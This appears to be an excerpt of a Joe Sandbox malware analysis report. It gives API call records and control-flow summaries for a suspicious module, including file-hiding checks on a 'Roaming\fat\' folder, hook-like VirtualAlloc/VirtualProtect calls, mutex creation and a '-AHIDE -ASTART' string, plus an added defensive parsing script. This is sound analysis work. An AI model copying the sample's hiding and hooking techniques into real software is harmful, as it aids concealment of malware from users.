• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_slist_appendcurl_slist_free_all
• String ID: Content-Type: application/dns-message
• API String ID: 2220803400-4173715026
• Opcode ID: f3822b394d4e1a50029ab220be55157be010b6bd24f4ff86c99671e1f5885ceb
• Instruction ID: 5596a46ba9fbd2f6600c03d417bf308fc137734a47f9cca09214730c021990e9
• Opcode Fuzzy Hash: f3822b394d4e1a50029ab220be55157be010b6bd24f4ff86c99671e1f5885ceb
• Instruction Fuzzy Hash: 4D21E5F2944B04ABE7118E70EC41BE7B7EDFF44348F004829EA1D93291E376A511CBA0
APIs
• curl_easy_strerror.LIBCURL(00000000), ref: 6B6CC579
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_easy_strerror
• String ID: Failure sending QUIT command: %s$QUIT
• API String ID: 1399792982-1162443993
• Opcode ID: 9188798f5bb0a616443183278e19d67f279a0ad68efcc32fa594c58a71471519
• Instruction ID: b4f90ce492b30b778564e51ca5e10682d2d825f63c4d00cf3b4661d0a25c2fe4
• Opcode Fuzzy Hash: 9188798f5bb0a616443183278e19d67f279a0ad68efcc32fa594c58a71471519
• Instruction Fuzzy Hash: 4621E0B0909740EBE7109B70C90AB87BBE8EF05309F440069F45E96251DBBDA164CBE6
APIs
• ___from_strstr_to_strchr.LIBCMT ref: 6B6FABA5
• ___from_strstr_to_strchr.LIBCMT ref: 6B6FABD5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ___from_strstr_to_strchr
• String ID: 8Tlk
• API String ID: 601868998-1816532293
• Opcode ID: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
• Instruction ID: febb0f59eb96f335deb13959db58bd3ce70e28c5883cc6a8578de9d39909911b
• Opcode Fuzzy Hash: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
• Instruction Fuzzy Hash: E41188B55082555FEB018E24AC807B6BBBFAF062D9F1444D6DCD49B203D329D957CBA0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: _strstr
• String ID: ;type=
• API String ID: 2882301372-3507045495
• Opcode ID: b64c4854e4de28a1433d0cbfed83d5ed7da3d69682219e6d29b52edc21e56f69
• Instruction ID: f171693af8faa99fac330b1ca7b15390c277acdce34c6885d4599bfaa743698f
• Opcode Fuzzy Hash: b64c4854e4de28a1433d0cbfed83d5ed7da3d69682219e6d29b52edc21e56f69
• Instruction Fuzzy Hash: 7011E6F15443459ED710DF68D8487C2BFE4EB05368F08027AE85E8F281D77AA55587E2

APIs
• getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B6C343B
• setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B6C3460
Level 0000FFFF is SOL_SOCKET and option 00001001 is SO_SNDBUF: the function reads the socket send-buffer size and then sets it (the fourth argument of setsockopt points at the new value).
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: getsockoptsetsockopt
• String ID: @
• API String ID: 194641219-2726393805
• Opcode ID: e3bc06be760f3c887caa528c37f2875e8f7a4479f0e656ee4ddac5dea0d927c2
• Instruction ID: 91f21098da90497277ff3b5576d3a6ad3095374fc5b60719853277f58c3818ec
• Opcode Fuzzy Hash: e3bc06be760f3c887caa528c37f2875e8f7a4479f0e656ee4ddac5dea0d927c2
• Instruction Fuzzy Hash: B501B5B1944209FBEF21DF94DC46BAE77B8EB01705F0081A1FA14EA2C0DBBAD6549B41

APIs
• curl_strnequal.LIBCURL(Digest,6B6DB74C,00000006,00000DD0,?,?,6B6DB74C), ref: 6B6DD8E6
A case-insensitive comparison of the first six characters of a header value against "Digest", i.e. libcurl's HTTP Digest authentication scheme detection.
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_strnequal
• String ID: Digest$t!
• API String ID: 482932555-3305821177
• Opcode ID: 91430005cd4cff66667082c7893c7055cd72c23b4460a806b69fe0b836426cf4
• Instruction ID: 5d2d683f165b673e8b6092787925fc5824dcae5207388d34e62dc1964cc9ee50
• Opcode Fuzzy Hash: 91430005cd4cff66667082c7893c7055cd72c23b4460a806b69fe0b836426cf4
• Instruction Fuzzy Hash: E7F0FCD3E4425412DB005D697C01B9777DD4F42158F0800B2FD9CDB242E62AE5158AF1

APIs
• _free.LIBCMT ref: 6B71FE82
  • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
  • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: 8hlk$8hlk
• API String ID: 1353095263-184109835
• Opcode ID: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
• Instruction ID: 817f8c4bc8f6697079c2808c04e4538ae84298697a88e5cfdec7e03868cd5e56
• Opcode Fuzzy Hash: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
• Instruction Fuzzy Hash: 26F06D371443059F8710CE68DA00A86B7E4EF99621310892AF89ED7211D330E412CBA0

APIs
• WSASetLastError.WS2_32(00002726,?,6B6E744F,?,?,?,?,00000000,?), ref: 6B6F04EE
• Sleep.KERNEL32(FFFFFFFE), ref: 6B6F0511
Error code 00002726 is 10022, WSAEINVAL; the Sleep argument FFFFFFFE is a near-infinite wait, so this is an error path rather than a timed delay.
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID: Otnk
• API String ID: 1458359878-2429921538
• Opcode ID: c8413a98bb0a9d6275c1ad748afb031a3cb3143410feee8ec2467330b1d0fb17
• Instruction ID: 49bbf2a865871e345904740672ae0e5d6e166038f080a0a6ad2a6a531947211e
• Opcode Fuzzy Hash: c8413a98bb0a9d6275c1ad748afb031a3cb3143410feee8ec2467330b1d0fb17
• Instruction Fuzzy Hash: C8E065B161460946EB184E694D04619335FAB85234F10D719BC39C62D4E7B9D4024540

Execution Graph

Execution Coverage: 20.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.9%
Total number of Nodes: 103
Total number of Limit Nodes: 5

The execution graph itself is an interactive rendering in the original report. What it records, for the module at 07000000 in process 0xB, are the functions that reach an API call:
• 7064002 GetShortPathNameA; 7064012 GetShortPathNameW
• 70640ce HttpQueryInfoW; 70640ed InternetReadFile, called in a loop until it fails or returns no data
• 70641d8 lstrcat, FindFirstFileA, then lstrcmp / lstrcat / FindNextFileA in a loop and FindClose (directory enumeration)
• 706418e SetFileAttributesA; 70642cc wsprintfA; 70642dc SHFileOperation; 7064365 SetErrorMode
• 7064826, 70647f1 and 706485e all call 70649ef, which calls 7064a0a: VirtualAlloc, then VirtualProtect twice
• 7064b3d StrRStrIA three times, then CreateFileA; 7064bb7 StrRStrIW three times, then CreateFileW
• 7064c7e StrCmpNIW; 7064cb5 StrCmpNIA; 7064cec and 7064d2f lstrcpy, PathRemoveBackslashA
• 7064d7d StrRStrIA, lstrlen, wsprintfA, CreateMutexA (the mutex name is built with wsprintfA before the call)
• 7064e18 lstrcmp, then SetErrorMode (7064365), lstrlen and wsprintfA; 7064faa lstrcmpW

Callgraph

Control-flow Graph

APIs
• lstrcat.KERNEL32(?,070641D4), ref: 070641D9
• FindFirstFileA.KERNEL32(?,?), ref: 070641ED
  • Part of subcall function 070641FD: lstrcmp.KERNEL32(?,070641FB), ref: 070641FE
  • Part of subcall function 070641FD: lstrcat.KERNEL32(?,?), ref: 0706422C
  • Part of subcall function 070641FD: FindNextFileA.KERNELBASE(?,?), ref: 07064251
  • Part of subcall function 070641FD: FindClose.KERNEL32(?), ref: 0706426D
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
• String ID:
• API String ID: 1879274390-0
• Opcode ID: 8af313923bb07023a55c4ac66069c8520caa648c5f57acff3dc1ab27e9a43229
• Instruction ID: 9081da09aba1cadf945909dbd7a4d57dc0c7406cf53e3290254af59d0544d461
• Opcode Fuzzy Hash: 8af313923bb07023a55c4ac66069c8520caa648c5f57acff3dc1ab27e9a43229
• Instruction Fuzzy Hash: F701D6F25042829FCB219F34DC5DA8B7FE9EB15341B424661F106D2211DA38C6108B21

Control-flow Graph

Basic blocks of the function at 7064bb7 (the original rendering marks each block as executed or not executed): entry 7064bb7-7064bc0 and 7064bc2-7064bc9; three StrRStrIW blocks at 7064bcb-7064bdd, 7064bdf-7064bf1 and 7064bf3-7064c05; an exit block 7064c07-7064c0e; and the CreateFileW block 7064c11-7064c2e. The entry block, the first StrRStrIW block and the third all have an edge into the CreateFileW block, and the second and third StrRStrIW blocks can also exit through 7064c07 without opening the file.

APIs
• StrRStrIW.SHELL32(?,00000000,07062E63), ref: 07064BD5
• StrRStrIW.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\fat\), ref: 07064BE9
• StrRStrIW.SHELL32(?,00000000,.log), ref: 07064BFD
• CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 07064C26
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: CreateFile
• String ID: .log$C:\Users\user\AppData\Roaming\fat\
• API String ID: 823142352-1129110882
• Opcode ID: 3e83f0f9e9a5d5ccc0b465a92b0860685f84ff2c0b72718761f39d1112cceb83
• Instruction ID: 3fece4ac68d7ff4adfcc1682eaa43331a7de747a484ba9de228a23eaf46a355d
• Opcode Fuzzy Hash: 3e83f0f9e9a5d5ccc0b465a92b0860685f84ff2c0b72718761f39d1112cceb83
• Instruction Fuzzy Hash: BB016D7220024ABBCF525F65DC5AF8B3FA5FF18764F048224F915A91A1DB7AC260EB50
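The function records on this page all share one fixed layout: an `APIs` list of `• API.MODULE(args), ref: ADDR` lines, with a `Part of subcall function ADDR:` prefix for calls reached through a callee. That makes them easy to mine when a report is too long to read end to end. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses three records transcribed from this page (the getsockopt/setsockopt pair, the FindFirstFileA loop and the StrRStrIW/CreateFileW check), pulls out the arguments the sandbox resolved to strings (the `fat\` directory and `.log` extension above) and tags each record with a behaviour label. The `PATTERNS` table and its names are our own labels, not Joe Sandbox's API ID scheme, and the sample text is a constructed copy of the lines shown on this page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines transcribed from three function records on this
# page (libcurl module at 6B6C0000 in process 0xA, injected module at 07000000 in
# process 0xB). The line format is Joe Sandbox's; the selection is ours.
SAMPLE = """\
APIs
• getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B6C343B
• setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B6C3460
APIs
• lstrcat.KERNEL32(?,070641D4), ref: 070641D9
• FindFirstFileA.KERNEL32(?,?), ref: 070641ED
  • Part of subcall function 070641FD: lstrcmp.KERNEL32(?,070641FB), ref: 070641FE
  • Part of subcall function 070641FD: FindNextFileA.KERNELBASE(?,?), ref: 07064251
  • Part of subcall function 070641FD: FindClose.KERNEL32(?), ref: 0706426D
APIs
• StrRStrIW.SHELL32(?,00000000,07062E63), ref: 07064BD5
• StrRStrIW.SHELL32(?,00000000,C:\\Users\\user\\AppData\\Roaming\\fat\\), ref: 07064BE9
• StrRStrIW.SHELL32(?,00000000,.log), ref: 07064BFD
• CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 07064C26
"""

# One "• API.MODULE(args), ref: ADDR" line, optionally prefixed by the subcall marker.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]+$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                       # address of the call instruction
    subcall: Optional[str] = None  # callee address when the call sits inside a subcall


def parse_records(text: str) -> List[List[Call]]:
    """Split the listing at each 'APIs' header and parse the bullet lines under it."""
    records: List[List[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = CALL_RE.match(line)
        if m and records:
            args = m["args"].split(",") if m["args"] else []
            records[-1].append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return records


def string_args(calls: List[Call]) -> List[str]:
    """Arguments the sandbox resolved to strings (not '?' and not a bare hex value)."""
    return [a for c in calls for a in c.args if a != "?" and not HEX_ARG.match(a)]


def base_name(api: str) -> str:
    """Drop the A/W charset suffix so FindFirstFileA and FindFirstFileW compare equal."""
    return api[:-1] if len(api) > 2 and api[-1] in "AW" else api


# Our own behaviour labels (not Joe Sandbox's API ID scheme): each pattern is the
# ordered list of unsuffixed API names that must all appear in a record.
PATTERNS = {
    "directory_enumeration": ["FindFirstFile", "FindNextFile"],
    "socket_buffer_tuning": ["getsockopt", "setsockopt"],
    "path_filter_then_open": ["StrRStrI", "CreateFile"],
}


def classify(calls: List[Call]) -> List[str]:
    """Return the names of every pattern whose APIs occur in order in this record."""
    seq = [base_name(c.api) for c in calls]
    hits = []
    for name, needed in PATTERNS.items():
        pos = 0
        for want in needed:
            try:
                pos = seq.index(want, pos) + 1
            except ValueError:
                break
        else:
            hits.append(name)
    return hits


if __name__ == "__main__":
    for record in parse_records(SAMPLE):
        print(record[0].ref, classify(record), string_args(record))
```

To use it on a full report, paste the function listing in place of `SAMPLE`. A `?` argument means the sandbox could not resolve the value, and a bare hex token is an address or constant rather than a string, which is why both are dropped by `string_args`; the path and extension from the CreateFileW record survive the filter and are the kind of value worth turning into a host-level search.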

Control-flow Graph

APIs
• StrRStrIA.SHELL32(?,00000000,07062E5B), ref: 07064B5B
• StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\fat\), ref: 07064B6F
• StrRStrIA.SHELL32(?,00000000,\log\), ref: 07064B83
• CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07064BAC
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: CreateFile
• String ID: C:\Users\user\AppData\Roaming\fat\$\log\
• API String ID: 823142352-2537490315
• Opcode ID: 158216dd6bedd5a0fc7b3319a860ffcd023fe9122ca6671e002e3afeb53782a6
• Instruction ID: 7285d1f455eb7f5e7e528b56916296f2bbdc9c4727231fcd60ffbc2f43176e89
                                                                                                                            • Opcode Fuzzy Hash: 158216dd6bedd5a0fc7b3319a860ffcd023fe9122ca6671e002e3afeb53782a6
                                                                                                                            • Instruction Fuzzy Hash: D6011D7120024AFBDF515F95DC5AF9A3FE9FF05754F008225FA15A80A0D7BAC660DB40

Control-flow Graph

APIs
Strings
• C:\Users\user\AppData\Roaming\fat\, xrefs: 07064E43
• C:\Users\user\AppData\Roaming\fat\, xrefs: 07064E59
• -AHIDE -ASTART, xrefs: 07064ED7
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: lstrcmplstrlen
• String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\fat\$C:\Users\user\AppData\Roaming\fat\
• API String ID: 898299967-807603291
• Opcode ID: d0d5663ac9830f152538eff5ee5857aefd135ccff5b5075167564ee33501e7db
• Instruction ID: 0a6d5bbfdc54589f080af8902a61b5171ac71969a330f855b0a46397350b4414
• Opcode Fuzzy Hash: d0d5663ac9830f152538eff5ee5857aefd135ccff5b5075167564ee33501e7db
• Instruction Fuzzy Hash: 591152F1690354FEE7907B70DC2AF8A36E9EB00714F518351B350A90D1DABD5A548E2A
APIs
• lstrcmp.KERNEL32(?,070641FB), ref: 070641FE
• FindNextFileA.KERNELBASE(?,?), ref: 07064251
• FindClose.KERNEL32(?), ref: 0706426D
  • Part of subcall function 07064210: lstrcmp.KERNEL32(?,0706420D), ref: 07064211
  • Part of subcall function 07064210: lstrcat.KERNEL32(?,?), ref: 0706422C
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: Findlstrcmp$CloseFileNextlstrcat
• String ID:
• API String ID: 360925478-0
• Opcode ID: df376b26f4071ed67b7d6ac83fc98c77ab5eff411329c3a661190221dd55037e
• Instruction ID: d016308b3b39e05bcd60cb43a1d69bd4974c8b88d14201a2fb0f7d6b01c17445
• Opcode Fuzzy Hash: df376b26f4071ed67b7d6ac83fc98c77ab5eff411329c3a661190221dd55037e
• Instruction Fuzzy Hash: F801D1F2504186AFCB52AF38DC5DA9E7FE9EB16345B1206A1F106D1211DF388A608B32

Control-flow Graph
control_flow_graph 46 7064210-7064219 lstrcmp 47 706424a-7064259 FindNextFileA 46->47 48 706421b-7064244 lstrcat 46->48 49 70641f6-7064206 call 70641fd 47->49 50 706425b-7064274 FindClose 47->50 48->47 49->47 54 7064208-7064219 call 7064210 49->54 54->47 54->48
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: Find$CloseFileNextlstrcatlstrcmp
• String ID:
• API String ID: 122021188-0
• Opcode ID: 527067ad32a0bed7e5f4a9c25d17938efa701b79111dcdf75ce785e8cae4976d
• Instruction ID: b58d46a0085d181eff2b5c11778440dba4ae8643dab637fb342bad256ccfeb63
• Opcode Fuzzy Hash: 527067ad32a0bed7e5f4a9c25d17938efa701b79111dcdf75ce785e8cae4976d
• Instruction Fuzzy Hash: 6FF090F2500145AFCB215F38DC49A9B3FF9EB55345F120561F206D1111DB388A619B31

Control-flow Graph
control_flow_graph 58 7064a0a-7064a1f 59 7064a25-7064a30 58->59 60 7064b1f-7064b21 58->60 61 7064a32-7064a35 59->61 62 7064a37-7064a3e 61->62 63 7064a4a-7064a71 VirtualAlloc 61->63 62->60 68 7064a44-7064a48 62->68 63->60 64 7064a77-7064a84 63->64 66 7064a86-7064a99 64->66 67 7064aa9-7064b13 VirtualProtect * 2 64->67 70 7064a9f-7064aa1 66->70 71 7064b16-7064b19 67->71 68->61 70->71 72 7064aa3-7064aa6 70->72 71->60 72->67
APIs
• VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07064F3C,07088D70,00000000,Tjs,07064C31,07088D20,00000000,070649CC), ref: 07064A6C
• VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07064AEF
• VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07064B13
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: c2ee980d06ee6299001cc78cbc22669a741c60400df149e93d93a037ae2cf8b6
• Instruction ID: d3080dbed19508d9a6edd4bb73a7cbdc39d793aed116e02065eaf3964b9a3485
• Opcode Fuzzy Hash: c2ee980d06ee6299001cc78cbc22669a741c60400df149e93d93a037ae2cf8b6
• Instruction Fuzzy Hash: 203154B5A0020AEFDB11DFB4C958E9EBBF9EF44740F158259F901A7294D774DA00CB60

Control-flow Graph
control_flow_graph 74 7064d7d-7064d88 StrRStrIA 75 7064dc4-7064dd3 CreateMutexA 74->75 76 7064d8a-7064d9c lstrlen 74->76 77 7064dd7-7064dda 75->77 78 7064dd5 75->78 76->75 80 7064d9e-7064da0 call 7064da8 76->80 78->77 82 7064da5-7064da6 80->82 82->75
APIs
• StrRStrIA.SHELL32(?,00000000,07064D74), ref: 07064D80
• lstrlen.KERNEL32(?), ref: 07064D8B
• CreateMutexA.KERNEL32(?,?), ref: 07064DCB
Memory Dump Source
